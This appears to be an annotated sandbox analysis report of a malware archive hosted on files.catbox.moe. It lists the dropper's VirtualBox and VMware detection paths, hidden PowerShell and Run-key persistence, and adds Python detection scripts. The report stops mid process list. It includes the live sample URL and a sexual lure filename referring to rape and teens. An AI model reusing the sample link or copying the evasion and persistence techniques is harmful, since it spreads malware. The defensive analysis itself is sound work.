Analysis

Max time kernel: 283s
Max time network: 283s
Platform: windows10-2004_x64
Resource: win10v2004-20240426-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 22-05-2024 00:31

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://files.catbox.moe/c95482.rar
  Resource: win10v2004-20240426-en
General

Target: https://files.catbox.moe/c95482.rar

Malware Config

Signatures
Enumerates VirtualBox DLL files (2 TTPs, 20 IoCs)

File opened (read-only) by both "Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif" and InputSvc.exe. Each process probes the same ten VirtualBox Guest Additions DLLs (10 paths x 2 processes = 20 IoCs):

  \??\c:\windows\system32\vboxmrxnp.dll
  \??\c:\windows\system32\vboxoglcrutil.dll
  \??\c:\windows\system32\vboxoglpackspu.dll
  \??\c:\windows\system32\vboxdisp.dll
  \??\c:\windows\system32\vboxoglfeedbackspu.dll
  \??\c:\windows\system32\vboxoglpassthroughspu.dll
  \??\c:\windows\system32\vboxogl.dll
  \??\c:\windows\system32\vboxoglerrorspu.dll
  \??\c:\windows\system32\vboxhook.dll
  \??\c:\windows\system32\vboxoglarrayspu.dll

The identical probe list from both binaries indicates they share the same anti-analysis code: the check is a plain "does this file exist" test, which is why the opens are read-only and fail harmlessly on a physical host.
Looks for VirtualBox drivers on disk (2 TTPs, 8 IoCs)

File opened (read-only) by both "Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif" and InputSvc.exe (4 drivers x 2 processes = 8 IoCs):

  \??\c:\windows\system32\drivers\VBoxGuest.sys
  \??\c:\windows\system32\drivers\VBoxSF.sys
  \??\c:\windows\system32\drivers\VBoxVideo.sys
  \??\c:\windows\system32\drivers\VBoxMouse.sys
Looks for VirtualBox executables on disk (2 TTPs, 6 IoCs)

File opened (read-only) by both InputSvc.exe and "Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif" (3 executables x 2 processes = 6 IoCs):

  \??\c:\windows\system32\vboxservice.exe
  \??\c:\windows\system32\vboxtray.exe
  \??\c:\windows\system32\vboxControl.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)
Runs PowerShell with its display window hidden.

  PID 5888  powershell.exe  (2 hits)
  PID 6072  powershell.exe  (2 hits)

The command lines of these two PowerShell instances are not part of the captured process tree below, so what the scripts did cannot be read from this report; the privilege list further down only shows each of them enabling SeDebugPrivilege.
Downloads MZ/PE file
Looks for VMware drivers on disk (2 TTPs, 4 IoCs)

File opened (read-only) by both InputSvc.exe and "Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif" (2 drivers x 2 processes = 4 IoCs):

  \??\c:\windows\system32\drivers\vmmouse.sys
  \??\c:\windows\system32\drivers\vmhgfs.sys
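The four signatures above are one technique observed from two processes: open a handful of well-known hypervisor guest-tool paths and branch on whether any exist. The routine below is an added detection example, not part of this report or of the sample. It scores read-only file-open events per process against the artifact names the report lists (the grouping into VirtualBox/VMware families is ours), strips the `\??\` NT object-manager prefix the sandbox records, and compares case-insensitively because the sample mixes spellings such as vboxControl.exe and VBoxGuest.sys. The event list is constructed from the report's IoCs plus a benign process, and the threshold of three distinct artifacts is an assumption.

```python
"""Score processes by how many hypervisor guest-tool artifacts they probe.

Added example: artifact names come from this report's IoC lists; the family
grouping, the threshold and SAMPLE_EVENTS (a subset of the report's opens,
one duplicate, plus a benign explorer.exe) are constructed for illustration.
"""
import re
from collections import defaultdict

# Basenames the sample opened read-only, grouped by hypervisor family.
VM_ARTIFACTS = {
    "virtualbox": {
        "vboxmrxnp.dll", "vboxoglcrutil.dll", "vboxoglpackspu.dll",
        "vboxdisp.dll", "vboxoglfeedbackspu.dll", "vboxoglpassthroughspu.dll",
        "vboxogl.dll", "vboxoglerrorspu.dll", "vboxhook.dll",
        "vboxoglarrayspu.dll", "vboxguest.sys", "vboxsf.sys", "vboxvideo.sys",
        "vboxmouse.sys", "vboxservice.exe", "vboxtray.exe", "vboxcontrol.exe",
    },
    "vmware": {"vmmouse.sys", "vmhgfs.sys"},
}

# The sandbox logs NT object-manager paths ("\??\c:\..."): drop the prefix,
# keep the basename, lower-case it.
_NT_PREFIX = re.compile(r"^\\\?\?\\")


def artifact_name(nt_path: str) -> str:
    """Return the lower-cased basename of an NT-style path."""
    return _NT_PREFIX.sub("", nt_path).rsplit("\\", 1)[-1].lower()


def score_vm_probes(events, threshold=3):
    """events: iterable of (process_name, path) pairs for read-only file opens.

    Returns {process: {family: [distinct artifacts probed]}} for every process
    that touched at least `threshold` distinct artifacts. Re-opening the same
    file counts once, so a loop over one DLL does not inflate the score.
    """
    seen = defaultdict(lambda: defaultdict(set))
    for process, path in events:
        name = artifact_name(path)
        for family, names in VM_ARTIFACTS.items():
            if name in names:
                seen[process][family].add(name)
    flagged = {}
    for process, families in seen.items():
        if sum(len(s) for s in families.values()) >= threshold:
            flagged[process] = {f: sorted(s) for f, s in families.items()}
    return flagged


DROPPER = ("Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs "
           "Leaked Snapchat Nudes and all.pif")

# Constructed from the report's IoCs (with one duplicate open) plus explorer.exe
# as benign noise: a single VirtualBox-named open is not evidence by itself.
SAMPLE_EVENTS = [
    (DROPPER, r"\??\c:\windows\system32\vboxmrxnp.dll"),
    (DROPPER, r"\??\c:\windows\system32\drivers\VBoxGuest.sys"),
    (DROPPER, r"\??\c:\windows\system32\vboxControl.exe"),
    (DROPPER, r"\??\c:\windows\system32\drivers\vmmouse.sys"),
    ("InputSvc.exe", r"\??\c:\windows\system32\vboxoglpackspu.dll"),
    ("InputSvc.exe", r"\??\c:\windows\system32\vboxoglpackspu.dll"),
    ("InputSvc.exe", r"\??\c:\windows\system32\drivers\vmhgfs.sys"),
    ("InputSvc.exe", r"\??\c:\windows\system32\vboxtray.exe"),
    ("explorer.exe", r"\??\c:\windows\system32\kernel32.dll"),
    ("explorer.exe", r"\??\c:\windows\system32\vboxhook.dll"),
]

if __name__ == "__main__":
    for process, families in score_vm_probes(SAMPLE_EVENTS).items():
        print(process, families)
```

Feeding this a Sysmon Event ID 11/FileCreate or a full sandbox file-open log is a matter of mapping each record to a (process, path) pair; the threshold is what keeps a lone legitimate VirtualBox Guest Additions component (which opens these same files on a real VM) from firing.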
Executes dropped EXE (4 IoCs)

  PID 2236  winrar-x64-701.exe
  PID 5560  winrar-x64-701.exe
  PID 1032  Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif
  PID 4504  InputSvc.exe

winrar-x64-701.exe is the file name of the WinRAR 7.01 (x64) installer, so the first two entries are most likely archive tooling fetched during the run to open the .rar rather than the sample's payload. The executions that matter are PID 1032 (the .pif, a renamed executable using a shortcut-like extension) and PID 4504 (InputSvc.exe, the binary the .pif registers for persistence below).
Loads dropped DLL (1 IoC)

  PID 5756  taskmgr.exe

The report does not name the DLL, so this entry cannot be tied to the sample from the data shown.
Adds Run key to start application (2 TTPs, 1 IoC)

  Process:   Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif
  Operation: Set value (str)
  Key:       \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  Value:     InputSvc = "C:\Users\Admin\AppData\Local\WindowsInputSvc\InputSvc.exe"

This is per-user persistence (HKCU\...\Run for the SID ending in -1000, the Admin account), which needs no elevation and fires at each logon of that user. Both the value name (InputSvc) and the purpose-made folder (WindowsInputSvc under %LOCALAPPDATA%) are chosen to read like a Windows component; the giveaway is that a genuine input service would live under \Windows\, not in a user-writable profile directory.
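A Run-key write like the one above can be triaged mechanically. The following is an added example, not part of the report: it parses the report's own `Set value (str) <key>\<name> = "<data>"` line shape, keeps only Run/RunOnce keys, undoes the doubled backslashes the report uses inside the quoted data, and applies three heuristics that this entry happens to trip (binary in a user-writable directory, a service-sounding value name whose binary is not under \Windows\, and a dedicated folder named after the entry). The list of user-writable locations and the heuristics are assumptions; the first sample line is copied from the report, the other two are constructed.

```python
"""Triage a sandbox "Set value" registry event for autorun persistence.

Added example, not part of the report. The line format is the one the
report prints; USER_WRITABLE and the naming heuristics are our assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Report line shape: Set value (<type>) <key>\<value name> = "<data>"
_SET_VALUE = re.compile(
    r'^Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\.+?)\\(?P<name>[^\\]+?) = "(?P<data>.*)"$'
)
_USER_SID = re.compile(r"\\REGISTRY\\USER\\(S-1-5-21-[\d-]+)", re.IGNORECASE)

# Per-user and per-machine autorun keys (lower-case suffixes of the key path).
RUN_KEY_SUFFIXES = (
    "\\software\\microsoft\\windows\\currentversion\\run",
    "\\software\\microsoft\\windows\\currentversion\\runonce",
)
# Locations an unprivileged user can write to (assumed list).
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\temp\\",
                 "\\programdata\\", "\\downloads\\", "\\users\\public\\")


@dataclass
class AutorunFinding:
    sid: Optional[str]          # owning user for HKU entries, None for HKLM
    value_name: str
    target: str                 # path as it will be executed at logon
    reasons: List[str] = field(default_factory=list)


def triage_autorun(line: str) -> Optional[AutorunFinding]:
    """Return a finding for a Run/RunOnce value write, else None."""
    m = _SET_VALUE.match(line)
    if not m:
        return None
    key = m.group("key")
    if not key.lower().endswith(RUN_KEY_SUFFIXES):
        return None
    name = m.group("name")
    # The report escapes backslashes inside the quoted data.
    target = m.group("data").replace("\\\\", "\\")
    low = target.lower()
    reasons = []
    if any(d in low for d in USER_WRITABLE):
        reasons.append("executable lives in a user-writable directory")
    # A Windows-sounding value name whose binary is not under \Windows\.
    if re.search(r"(svc|service|host|update)$", name, re.IGNORECASE) and "\\windows\\" not in low:
        reasons.append("service-like value name outside the Windows directory")
    # Dropper layout: a purpose-made folder named after the autorun entry.
    parts = low.split("\\")
    if len(parts) >= 2 and name.lower() in parts[-2] and parts[-2] != name.lower():
        reasons.append("dedicated folder named after the autorun entry")
    sid = _USER_SID.search(key)
    return AutorunFinding(sid.group(1) if sid else None, name, target, reasons)


# First line is copied from the report; the other two are constructed.
SAMPLE_LINES = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\InputSvc = "C:\\Users\\Admin\\AppData\\Local\\WindowsInputSvc\\InputSvc.exe"',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = "C:\\Windows\\system32\\SecurityHealthSystray.exe"',
    r'Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(triage_autorun(line))
```

The same three checks apply unchanged to Sysmon Event ID 13 (RegistryEvent SetValue) records once the TargetObject and Details fields are put into this line shape.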
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

  IoC details are not included in this capture; the submitted sample itself is served from files.catbox.moe.
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.

  Flow 151  ip-api.com
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.

  Process: taskmgr.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName

All three reads come from Task Manager, which resolves disk names for its Performance view (property 000A under {b725f130-47ef-101a-a5f1-02608c9eebac} is DEVPKEY_NAME, the device display name). Malware fingerprinting a sandbox reads the same keys, usually testing the Ven_/Prod_ strings for hypervisor vendors, but none of the sample's processes is listed here.
Enumerates system info in registry (2 TTPs, 3 IoCs)

  Process: msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS

All three reads are by the browser, which collects hardware model strings for its own metrics and crash reports. The same keys are a staple of malware VM detection (manufacturer strings such as "innotek GmbH" or "VMware, Inc."), but no sample process is recorded touching them.
GoLang User-Agent (1 IoC)
Uses the default User-Agent string that Go's net/http client sends when a program sets none.

  Flow 152  HTTP User-Agent header: Go-http-client/1.1

No browser sends this header, so a non-browser process in the run, most plausibly the .pif or InputSvc.exe, is a Go binary; the report does not record which process owns flow 152.
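The two network signatures above (an external-IP lookup against ip-api.com on flow 151, and a default Go User-Agent on flow 152) are the kind of thing a flow-level triage pass catches without any payload inspection. The code below is an added example, not part of the report: it classifies HTTP flow records by destination and User-Agent. Flows 151 and 152 are the report's; the fields the report does not give for them (the UA of 151, the host of 152), the third browser flow, and the lookup-host and UA lists beyond ip-api.com and Go are constructed or assumed.

```python
"""Flag HTTP flows whose User-Agent or destination betrays tooling, not a browser.

Added example, not part of the report. Only flow ids 151/152, the host
ip-api.com and the string Go-http-client/1.1 come from the report; the rest
of SAMPLE_FLOWS and the lookup/UA tables are constructed.
"""
import re
from typing import Dict, List

# Services that echo the caller's public IP; the report names only ip-api.com.
IP_LOOKUP_HOSTS = {"ip-api.com", "api.ipify.org", "ifconfig.me", "icanhazip.com",
                   "checkip.amazonaws.com"}

# Default User-Agent values of common HTTP client libraries. Go's net/http
# sends exactly "Go-http-client/1.1" (or /2.0 over HTTP/2) unless overridden.
TOOLING_UA = {
    "Go net/http": re.compile(r"^Go-http-client/(1\.1|2\.0)$"),
    "python-requests": re.compile(r"^python-requests/"),
    "curl": re.compile(r"^curl/"),
    "PowerShell WebClient": re.compile(r"WindowsPowerShell/"),
}


def classify_flow(flow: Dict[str, str]) -> List[str]:
    """Return the reasons a single flow is notable (empty list if none)."""
    reasons = []
    host = flow.get("host", "").lower().rstrip(".")
    if host in IP_LOOKUP_HOSTS:
        reasons.append(f"external IP lookup via {host}")
    ua = flow.get("user_agent", "")
    for library, pattern in TOOLING_UA.items():
        if pattern.search(ua):
            reasons.append(f"default {library} User-Agent")
            break
    return reasons


def triage_flows(flows) -> Dict[str, List[str]]:
    """Map flow id -> reasons for every flow with at least one reason."""
    result = {}
    for flow in flows:
        reasons = classify_flow(flow)
        if reasons:
            result[flow["id"]] = reasons
    return result


SAMPLE_FLOWS = [
    # Report: flow 151 to ip-api.com. Its User-Agent is not in the report; assumed.
    {"id": "151", "host": "ip-api.com", "user_agent": "Go-http-client/1.1"},
    # Report: flow 152 carried "Go-http-client/1.1". Destination not given; placeholder.
    {"id": "152", "host": "c2.example.invalid", "user_agent": "Go-http-client/1.1"},
    # Constructed browser flow for contrast (Edge 92 UA, the version in the process tree).
    {"id": "7", "host": "files.catbox.moe",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                   "(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67"},
]

if __name__ == "__main__":
    for flow_id, reasons in triage_flows(SAMPLE_FLOWS).items():
        print(flow_id, "; ".join(reasons))
```

A default library User-Agent is weak evidence on its own (plenty of legitimate Go tooling never sets one); it becomes worth an alert when, as here, it appears on a freshly infected workstation alongside an IP-lookup call.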
Modifies registry class (4 IoCs)

  Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings  (msedge.exe)
  Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings  (OpenWith.exe)
  Key created  \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1162180587-977231257-2194346871-1000\{FA340891-EFAC-4159-89D2-98EE5D73DEFD}  (msedge.exe)
  Key created  \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings  (taskmgr.exe)

These are shell and COM housekeeping keys that any GUI process creates. The one detail of interest is OpenWith.exe: it is the "How do you want to open this file?" dialog, which appears when a file type has no registered handler, consistent with the downloaded .rar being opened on an image with no archiver associated with that extension.
Writes a root certificate to the AuthRoot store (3 IoCs)

  Process: InputSvc.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob, omitted)
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob, omitted)

D4DE20D05E66FC53FE1A50882C78DB2852CAE474 is the SHA-1 thumbprint of the Baltimore CyberTrust Root CA. AuthRoot is the cache Windows fills through its automatic root update when a TLS chain needs a Microsoft-distributed root that is not yet on the machine, and that download happens inside the process doing the TLS handshake. A Go binary making its first HTTPS connection is therefore expected to produce exactly this write; it is not evidence of a rogue CA being installed, which would instead show up as an unfamiliar thumbprint under the ROOT store.
NTFS ADS (1 IoC)

  Process: msedge.exe
  File opened for modification  C:\Users\Admin\Downloads\Unconfirmed 422667.crdownload:SmartScreen

This is Edge writing its own SmartScreen alternate data stream onto the in-progress download (.crdownload is Chromium's partial-download name), alongside the Zone.Identifier mark-of-the-web. It records the download's reputation check; it is not the sample hiding data in a stream.
Suspicious behavior: AddClipboardFormatListener (1 IoC)

  PID 5492  vlc.exe

vlc.exe is the VLC media player; a clipboard-format listener is ordinary GUI-toolkit behaviour and is not attributable to the sample.
Suspicious behavior: EnumeratesProcesses (64 IoCs)

  msedge.exe PIDs 1644, 1692, 3812, 4896, 5676, 3716, 5592, 4028, 4944, 1804: 2 hits each
  msedge.exe PID 5780: 4 hits
  identity_helper.exe PID 3484: 2 hits
  taskmgr.exe PID 5756: all remaining hits

Process enumeration by Edge's utility processes and by Task Manager is expected for those binaries; none of the sample's processes (the .pif, InputSvc.exe, powershell.exe) appears in this list.
Suspicious behavior: GetForegroundWindowSpam (2 IoCs)

  PID 5492  vlc.exe
  PID 5756  taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (26 IoCs)

  26 hits, all from msedge.exe (PID 1692).

This is Edge's own child-process hardening: it spawns its children with the "block non-Microsoft binaries" mitigation policy so that third-party DLLs cannot load into them. Attribute it to the browser, not to the sample.
Suspicious use of AdjustPrivilegeToken (58 IoCs)

  taskmgr.exe (PID 5756):    SeDebugPrivilege, SeSystemProfilePrivilege, SeCreateGlobalPrivilege, 33, SeIncBasePriorityPrivilege
  7zG.exe (PID 4636):        SeRestorePrivilege, 35, SeSecurityPrivilege (x2)
  wmic.exe (PID 5516), the same sequence twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  powershell.exe (PID 5888): SeDebugPrivilege
  powershell.exe (PID 6072): SeDebugPrivilege
  svchost.exe (PID 2460):    SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, 35

The bare numbers are privilege LUIDs the sandbox did not resolve to names: 33 = SeIncreaseWorkingSetPrivilege, 34 = SeTimeZonePrivilege, 35 = SeCreateSymbolicLinkPrivilege, 36 = SeDelegateSessionUserImpersonatePrivilege. wmic.exe enabling every privilege present in its token at startup (the list is in ascending LUID order) is that tool's normal behaviour, Task Manager enables SeDebugPrivilege to inspect other processes, and 7-Zip (7zG.exe) enables backup/restore-class privileges when extracting. powershell.exe also routinely enables SeDebugPrivilege at startup, so those two entries confirm that PowerShell ran (hidden, per the signature above), not what it executed.
Suspicious use of FindShellTrayWindow (64 IoCs)

  PID 1692  msedge.exe  (the large majority of hits)
  PID 5492  vlc.exe
Suspicious use of SendNotifyMessage (64 IoCs)

  PID 1692  msedge.exe
  PID 5492  vlc.exe
  PID 5756  taskmgr.exe
Suspicious use of SetWindowsHookEx (14 IoCs)

  PID 5384  OpenWith.exe         (7 hits)
  PID 5492  vlc.exe              (1 hit)
  PID 2236  winrar-x64-701.exe   (3 hits)
  PID 5560  winrar-x64-701.exe   (3 hits)

All four are interactive GUI processes (the Open With dialog, VLC and the WinRAR installer) installing ordinary window-message hooks; none of the sample's processes is listed, so this is not evidence of keylogging.
Suspicious use of WriteProcessMemory (64 IoCs)

  Source: msedge.exe (PID 1692). Targets, all msedge.exe child processes, in the order recorded: PID 1508 (2 writes), PID 3224, PID 1644 (2 writes), PID 1360.

Every write goes from the Edge browser process into one of its own freshly spawned children (the crashpad handler, GPU process, network service and storage service in the tree below). That is how Chromium-based browsers bootstrap child processes; it is not process injection by the sample.
Processes

msedge.exe  [PID 1692, depth 1]
  Image:    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  Cmdline:  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://files.catbox.moe/c95482.rar
  Signatures:
  - Enumerates system info in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
Children of PID 1692 (depth 2). All run from C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe except the two identity_helper.exe instances, which run from C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe.

  PID 1508  msedge.exe (crashpad handler)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe1ff746f8,0x7ffe1ff74708,0x7ffe1ff74718

  PID 3224  msedge.exe (GPU process)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2

  PID 1644  msedge.exe (network service)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses

  PID 1360  msedge.exe (storage service)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8

  PID 748  msedge.exe (renderer, client id 6)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

  PID 4960  msedge.exe (renderer, client id 5)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

  PID 848  identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8

  PID 3484  identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses

  PID 4044  msedge.exe (renderer, client id 8)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

  PID 4144  msedge.exe (renderer, client id 9, instant process)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1

  PID 4708  msedge.exe (collections data manager)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5576 /prefetch:8

  PID 3492  msedge.exe (renderer, client id 12)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:1

  PID 3140  msedge.exe (renderer, client id 13)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1

  PID 532  msedge.exe (renderer, client id 14, instant process)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1

  PID 3812  msedge.exe (quarantine service)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses

  PID 5216  msedge.exe (renderer, client id 16)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

  PID 5388  msedge.exe (renderer, client id 17)
